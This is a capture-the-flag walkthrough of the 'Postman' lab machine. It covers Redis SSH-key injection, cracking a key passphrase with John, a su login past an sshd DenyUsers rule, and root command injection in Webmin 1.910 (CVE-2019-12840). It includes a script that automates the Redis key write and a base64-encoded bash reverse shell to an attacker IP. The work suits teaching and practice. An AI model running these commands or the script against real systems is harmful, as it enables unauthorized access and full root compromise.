
postman

RECON


Nmap Scan

nmap -p- -A -T4 10.10.10.160

-p- scans all 65535 TCP ports, -A turns on aggressive scanning (service/version detection, default scripts, OS detection, traceroute), -T4 uses a faster timing template.

Nmap finds Redis on port 6379 and a web server on port 10000.

Webpage check

The webpage on port 10000 shows an error, and the link it offers does not work.

Navigating to the proper page reveals a Webmin login.

Redis

 sudo apt-get install redis-tools 


Redis Host

redis-cli -h 10.10.10.160


Directory Check

CONFIG GET dir
CONFIG SET dir /var/lib/redis/.ssh

Redis answers both CONFIG commands without any authentication: the working directory (the redis user's home, /var/lib/redis) can be read, and it can be pointed at the .ssh directory inside it. That is what makes the key write below possible.

ENUMERATION

SSH Key

ssh-keygen -f ~/id_rsa

Generate a fresh key pair; ~/id_rsa is the path used in the following steps.

Copy key to .txt file

(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > key.txt

The blank lines around the public key matter: the value will be written inside an RDB dump that carries binary header and trailer bytes, and the padding keeps the key on a line of its own so sshd can still parse it.

Send key to host

cat key.txt | redis-cli -h 10.10.10.160 -x set ssh_key

-x reads the last argument from stdin, so the whole padded key becomes the value stored under ssh_key.

Check key

get ssh_key

From an interactive redis-cli -h 10.10.10.160 session, this confirms the padded key was stored.

Set database

CONFIG SET dir /var/lib/redis/.ssh
CONFIG SET dbfilename authorized_keys
save
exit

SAVE writes the in-memory dataset, including the ssh_key value, to /var/lib/redis/.ssh/authorized_keys. Any existing authorized_keys there is overwritten, and dir/dbfilename stay changed until they are set back.

SSH into the host

ssh -i ~/id_rsa redis@10.10.10.160
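The Redis-to-authorized_keys sequence above, collected into one script. This is an added example, not the author's own commands. It assumes redis-cli is installed locally, that the target's redis user has home /var/lib/redis with an existing .ssh directory (as on this box), and it adds two things the manual steps skip: checking Redis's reply text (redis-cli exits 0 even on an ERR reply) and restoring dir/dbfilename afterwards. REDIS_CLI is a hook introduced here so the functions can be exercised against a stub.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: automates the
# unauthenticated-Redis -> authorized_keys write shown above.
# Assumptions: redis-cli is installed locally, the target's redis user has
# home /var/lib/redis with an existing .ssh directory (true on this box),
# and REDIS_CLI may be pointed at a stub command for a dry run.
set -eu

redis_cli() { "${REDIS_CLI:-redis-cli}" "$@"; }

# Surround the public key with blank lines so it ends up on a line of its
# own inside the RDB dump, whose binary header/trailer sshd cannot parse.
make_padded_key() {              # $1 = id_rsa.pub, $2 = output file
    { printf '\n\n'; cat "$1"; printf '\n\n'; } > "$2"
}

# Run one command and require Redis's literal OK reply. redis-cli exits 0
# even when the server answers ERR, so the text has to be checked.
redis_expect_ok() {              # $1 = host, $2.. = command
    host=$1; shift
    reply=$(redis_cli -h "$host" "$@")
    [ "$reply" = "OK" ] || { echo "redis '$*' failed: $reply" >&2; return 1; }
}

# Store the key, point the dump at ~redis/.ssh/authorized_keys, and SAVE.
# CONFIG SET dir fails if the directory does not exist, which is the usual
# reason this technique does not work against a given instance.
redis_write_authorized_keys() {  # $1 = host, $2 = padded key file, [$3 = .ssh dir]
    host=$1; keyfile=$2; sshdir=${3:-/var/lib/redis/.ssh}
    redis_expect_ok "$host" -x set ssh_key < "$keyfile"
    redis_expect_ok "$host" config set dir "$sshdir"
    redis_expect_ok "$host" config set dbfilename authorized_keys
    redis_expect_ok "$host" save
}

# Put dir/dbfilename back so later background saves do not keep rewriting
# authorized_keys; the defaults assumed here are Debian's.
redis_restore_defaults() {       # $1 = host
    redis_expect_ok "$1" config set dir /var/lib/redis
    redis_expect_ok "$1" config set dbfilename dump.rdb
}

# Example run (needs network reach to the target):
#   bash this_script.sh run 10.10.10.160 ~/id_rsa.pub
if [ "${1:-}" = "run" ]; then
    make_padded_key "$3" key.txt
    redis_write_authorized_keys "$2" key.txt
    redis_restore_defaults "$2"
    echo "now: ssh -i ${3%.pub} redis@$2"
fi
```

The other keys in the instance are dumped into the same file; that is harmless for the login because sshd skips authorized_keys lines it cannot parse, which is also why the blank-line padding around the key is enough.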

Checking directories

The authorized_keys file is in place under /var/lib/redis/.ssh.

Home directory

cd /home
ls -l
cd Matt
ls -l

The user flag is readable by Matt, not by the redis account, so the next step is to become Matt.

Opt directory

cat /opt/id_rsa.bak

Reveals a private RSA key. It is passphrase-protected, which is what the cracking step below deals with.

PRIVILEGE ESCALATION

John the Ripper

Copy the key into a local file (postman_id_rsa_enc) and convert it into a hash John can work on:

/usr/share/john/ssh2john.py postman_id_rsa_enc > postman_id_rsa.john

Cracked Password

john postman_id_rsa.john --wordlist=/usr/share/wordlists/rockyou.txt

John with rockyou.txt reveals the passphrase to be computer2008.

SSH Matt

ssh Matt@10.10.10.160

The login is refused (permission denied) even with the right credentials.

Checking SSH

cd /etc/ssh/
ls

sshd_config contains a DenyUsers entry for Matt, so sshd refuses that account regardless of credentials. The restriction applies only to SSH; a local su is not affected.

su to Matt

su Matt
Password: computer2008
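The sshd check described above, turned into a small script that reads an sshd_config and reports whether a given login name would get past sshd at all. This is an added example, not part of the original write-up. It follows the precedence sshd uses for the user directives (DenyUsers is checked first and always wins; if AllowUsers is present the user must match one of its patterns). DenyGroups, AllowGroups and Match blocks are deliberately out of scope, and the sample config in the test is constructed.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: evaluates the DenyUsers /
# AllowUsers directives of an sshd_config for one login name, with the
# precedence sshd applies (DenyUsers first, then AllowUsers). The group
# directives and Match blocks are out of scope for this check.
# -f disables pathname expansion so patterns such as admin* stay literal
# until they are used as case patterns.
set -euf

# Print the space-separated patterns of every line for one keyword.
# Keywords are case-insensitive and comment lines start with '#'.
# USER@HOST patterns are reduced to their USER part.
directive_patterns() {   # $1 = keyword, $2 = path to sshd_config
    grep -iE "^[[:space:]]*$1[[:space:]]" "$2" \
        | sed -E 's/^[[:space:]]*[A-Za-z]+[[:space:]]+//; s/@[^[:space:]]*//g' \
        || true
}

# Return 0 if sshd would let $1 try to authenticate, 1 if it is refused
# before any credential is looked at.
ssh_user_allowed() {     # $1 = login name, $2 = path to sshd_config
    user=$1; cfg=$2
    # Any DenyUsers match wins, whatever AllowUsers says.
    for pat in $(directive_patterns DenyUsers "$cfg"); do
        case "$user" in $pat) return 1 ;; esac
    done
    # If AllowUsers is configured at all, the user must match one of its patterns.
    allow=$(directive_patterns AllowUsers "$cfg")
    [ -z "$allow" ] && return 0
    for pat in $allow; do
        case "$user" in $pat) return 0 ;; esac
    done
    return 1
}

# Example run on the target after the redis login:
#   bash this_script.sh Matt /etc/ssh/sshd_config
if [ "${1:-}" != "" ]; then
    if ssh_user_allowed "$1" "${2:-/etc/ssh/sshd_config}"; then
        echo "$1: sshd would accept the login"
    else
        echo "$1: sshd refuses this user; su or another service is the way in"
    fi
fi
```

The point the script makes explicit is the one the box relies on: DenyUsers is an sshd setting, not an account lock, so the same password still works for su (and, as the next section shows, for Webmin).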

The user flag is now accessible.

Webmin is also accessible with the same credentials (Matt / computer2008).

Checking the version shows Webmin 1.910.

Root shell

Vulnerability

Webmin 1.910 is affected by CVE-2019-12840: any user authorized to the Package Updates module can execute arbitrary commands with root privileges through update.cgi, since Webmin itself runs as root. Matt's account has access to that module.

Navigate to Package Updates and turn on the Burp Suite interceptor.

Send the package-updates request to Repeater. Strip the extra HTTP parameters and add u=acl%2Fapt&u=$ so that whatever follows the $ is run as a shell command substitution.

Payload

Base64

echo -n 'bash -c "bash -i >& /dev/tcp/10.10.14.9/4444 0>&1"' | base64

echo -n drops the trailing newline; bash -c runs the quoted command string; bash -i starts an interactive shell whose stdout and stderr (>&) go to the TCP connection /dev/tcp/HOST/LISTENING_PORT and whose stdin (0>&1) comes from the same connection. 10.10.14.9 is the attacking host and 4444 the listening port.

Netcat

nc -lvp 4444

-l listen, -v verbose, -p local port 4444.

URL Encode

$(echo${IFS}TCPSTRING|base64${IFS}-d|bash)

TCPSTRING stands for the base64 output of the previous step. ${IFS} expands to whitespace, so the injected command contains no literal spaces that would break the parameter; base64 -d decodes the string and bash runs it. URL-encode the whole expression before placing it in the request.

Put the payload in Repeater after u=acl%2Fapt&u= and send the request.

Shell

The reverse shell connects back to the listener as root, because Webmin runs as root.

The root flag is in root's home directory.